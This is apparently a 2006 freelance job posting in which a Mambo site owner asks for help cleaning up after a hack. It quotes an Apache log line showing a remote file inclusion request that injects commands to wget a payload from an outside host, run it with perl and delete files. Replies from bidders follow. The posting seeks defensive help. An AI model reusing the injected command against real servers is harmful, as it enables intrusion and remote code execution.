I have a website which runs Mambo (version 4.52 I beleive)- recently it was "hacked" and some scripts put into the [url removed, login to view] and other files, so that the following occurs:
/usr/local/apache/domlogs/[url removed, login to view]:[url removed, login to view] - - [13/Jul/2006:12:26:11 -0500] "GET /[url removed, login to view][option]=com_content&_RE
QUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=[url removed, login to view];cmd=cd%20/tmp/;wget%20[url removed, login to view]
.txt;perl%[url removed, login to view];rm%20-rf%20mambo.*? HTTP/1.0" 200 - "-" "Mozilla/5.0"
What happens immediately thereafter are DOS style attacks which barrage the server with massive amounts of data.
I need someone who can go through and make sure all portions of this nasty bug are removed, and to help CHMOD files and ensure that we are at least a bit secure from future attacks.
For someone who knows what they are doing, this is a quick job- more work will follow though if this is done well- this same site needs some tweaking with other minor problems (e.g. after a search, when one hits the "back" button, the previous page will not reload).
8 freelancers are bidding on average $58 for this job
If this is your server then I can secure it to help prevent this from happening. If it is not I can suggest to your hosting company steps that should have already been taken to ensure that these exploits are stopped.
i only put 7 days cause it depends on he project. it sounds like a simple script injection. those can be stopped. i'm pretty good at website security. i also work for [url removed, login to view]